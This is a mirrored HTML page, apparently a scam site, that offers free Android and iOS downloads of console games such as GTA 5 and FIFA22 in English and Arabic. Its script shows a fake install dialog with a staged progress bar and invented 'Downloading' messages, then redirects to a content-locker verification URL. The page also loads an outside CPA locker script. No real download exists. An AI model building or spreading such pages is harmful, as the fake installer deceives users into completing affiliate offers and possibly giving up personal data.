<html>

<!-- Mirrored from 3apps.pro/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 01 Apr 2020 15:36:39 GMT -->
<!-- Added by HTTrack -->
<!-- Mirrored from www.gtmobile2.online/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 18 Apr 2022 17:59:08 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <meta name="pushsdk" content="0b3aea1c0f84c935acb87c8cc9a720bb">
    <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="../maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
    <link href="../netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap-glyphicons.css" rel="stylesheet">

    <title>5apps</title>
    <!-- Styles -->
    <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,300,600" rel="stylesheet" type="text/css">
    <link href="build/panel/app.css" rel="stylesheet">
    <link href="css/app.css" rel="stylesheet">
    <link href="css/framework7.css" rel="stylesheet">


    
   <script type="text/javascript">
    var CPABUILDSETTINGS={"it":2515119,"key":"b65be"};
</script>
<script src="https://d12u7tum9sda5e.cloudfront.net/8ec0b87.js"></script>
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());

        gtag('config', 'UA-120201847-3');
    </script>
</head>
<body>
<main class="page-content framework7-root">
    <div class="page-inner white-bg">
        <div id="main-wrapper">
            <div class="row">
                <div class="col-md-6 col-xs-12 col-sm-12 center">
                    <div class="main-page-title">
                        <img src="img/logoe358e358.png?t" class="app-navbar-head-logo center breathing">
                    </div>
                    <br>
                    <div class="app-box appscloud-block">

                       
                        
                        <div class="col-md-12 app-list-md">
                                <div class="app-box">
                                    <img class="img-responsive ios-icon app-icon" src="../i.imgur.com/hwOzeJQ.png">
                                    <div class="app-info">
                                        <div class="app-name">GTA 4</div>
                                        <p class="app-version" style="font-size: 10px">ANDROID And IOS</p>
                                    </div>
                                    <a href="#" onclick="install('../i.imgur.com/hwOzeJQ.png', 'GTA 4','af25c73')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text"><b>INSTALL تثبيت</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                </div>
                            </div>
                            
                            
                        <div class="col-md-12 app-list-md">
                                <div class="app-box">
                                    <img class="img-responsive ios-icon app-icon" src="../i.imgur.com/0Ks3qm0.jpg">
                                    <div class="app-info">
                                        <div class="app-name">GTA 5</div>
                                        <p class="app-version" style="font-size: 10px">ANDROID And IOS</p>
                                    </div>
                                    <a href="#" onclick="install('../i.imgur.com/0Ks3qm0.jpg', 'GTA 5','4bed6d7')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text"><b>INSTALL تثبيت</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                </div>
                            </div>
                            
                            <div class="col-md-12 app-list-md">
                                <div class="app-box">
                                    <img class="img-responsive ios-icon app-icon" src="../i.imgur.com/gHm5L6f.jpg">
                                    <div class="app-info">
                                        <div class="app-name">RIDERS REPUBLIC</div>
                                        <p class="app-version" style="font-size: 10px">ANDROID And IOS</p>
                                    </div>
                                    <a href="#" onclick="install('../i.imgur.com/gHm5L6f.jpg', 'RIDERS REPUBLIC','48ac3bd')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text"><b>INSTALL تثبيت</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                </div>
                            </div>
                            
                            
                            <div class="col-md-12 app-list-md">
                                <div class="app-box">
                                    <img class="img-responsive ios-icon app-icon" src="../i.imgur.com/5M1ZsvA.png">
                                    <div class="app-info">
                                        <div class="app-name">Spider-Man: Miles Morales</div>
                                        <p class="app-version" style="font-size: 10px">ANDROID And IOS</p>
                                    </div>
                                    <a href="#" onclick="install('../i.imgur.com/5M1ZsvA.png', 'Spider-Man','815f75a')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text"><b>INSTALL تثبيت</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                </div>
                            </div>
                           
                             
                            
                            
                        
                      
                            
                                                    <div class="col-md-12 app-list-md">
                                <div class="app-box">
                                    <img class="img-responsive ios-icon app-icon" src="../i.imgur.com/aencyzF.jpg">
                                    <div class="app-info">
                                        <div class="app-name">FIFA22</div>
                                        <p class="app-version" style="font-size: 10px">ANDROID And IOS</p>
                                    </div>
                                    <a href="#" onclick="install('../i.imgur.com/aencyzF.jpg', 'FIFA22','7608431')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text"><b>INSTALL تثبيت</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                </div>
                            </div>
                            
                            
                    </div>
                </div>
            </div><!-- Row -->
        </div><!-- Main Wrapper -->
    </div><!-- Page Inner -->
</main><!-- Page Content -->

<div class="popup modal-in" id="install" style="background: #fff; display: none;">
    <div class="fake-homescreen" style="">
        <a id="close" class="close-button"></a>
        <div class="iphone-display" aria-hidden="true">
            <div class="app-icon-area">
                <div class="app-icon-region">
                    <img id="app_icon" alt="app icon" src="#" class="app-modal-icon" style="width: 33px; height: 33px;">
                </div>
                <div class="fake-homescreen-app-name" style="font-size:7.5px!important">
                    <span id="app_name" class="installingAppName">Pokemon Go Spoofing</span>
                </div>
            </div>
        </div>
    </div>
    <div class="block" style="color:#000000">
        <center>
            <div>
                <div class="app-caption">
                    <h2 id="app-caption-title">title</h2>
                    <p>Follow the steps after downloading إتبع الخطوات بعد التحميل</p>
                </div>
                <hr>
                <div class="details">
                    <a class="btn btn-info btn-block install-btn" onclick="start()" id="install-btn">download تحميل</a>
                    <p>Free مجاناً</p>
                </div>
            </div>
        </center>
    </div>
</div>
<div role="dialog">

    <div class="md" id="myPopup1" style="display: none">
        <div class="dialog-backdrop backdrop-in"></div>
        <div class="dialog dialog-no-buttons dialog-progress modal-in" id="myPopup" style="display: none; margin-top: -100px;">

            <div class="dialog-inner">
                <div class="dialog-title">انتظر جاري التحميل <br>downloading...
</div><div id="dt" class="dialog-text">Sit tight</div>
                <div class="progressbar">
                    <span id="bar1" style="width: 0%; display: inline-block; height: 100%; transform: scale(-1, 1);"></span>
                </div>
            </div>

        </div>
    </div>
</div>
<script>var lockerIDs=[];</script><script src="js/ipscript.js" type="text/javascript"></script>
<script>
    function id(id){
        return document.getElementById(id);
    }

    function install(icon, name, locker_id)
    {
        id("app_icon").src = icon;
        id("app_name").innerHTML = name;
        id("app-caption-title").innerHTML = name;

        window.lcr = "https://gtmobile2.online/verify/" + (lockerIDs[name] ? lockerIDs[name] : locker_id);
        id("install").style.display = "block";
    }

    id('close').onclick = function(){
        id("install").style.display = "none";
    }

    // When the user clicks on div, open the popup
    function start() {
        var x = document.getElementById("myPopup1");
        if (x.style.display === "none") {
            x.style.display = "block";
        } else {
            x.style.display = "none";
        }
        var x = document.getElementById("myPopup");
        if (x.style.display === "none") {
            x.style.display = "block";
        } else {
            x.style.display = "none";
        }

        var i = 0;
        $("#bar1").animate(
                {width: "100%"},
                {
                    duration: 2000,
                    complete : function(){
                        location.href = window.lcr;
                    }
                });


        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Connecting to the servers')
            }

            setTimeout(changeText, 100);

        });
        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Getting package url')
            }

            setTimeout(changeText, 100);

        });
        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Downloading')
            }

            setTimeout(changeText, 200);

        });

        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Setting up final stage')
            }

            setTimeout(changeText, 100);

        });


    }
</script>
</body>

<!-- Mirrored from 3apps.pro/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 01 Apr 2020 15:36:45 GMT -->

<!-- Mirrored from www.gtmobile2.online/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 18 Apr 2022 17:59:11 GMT -->
</html>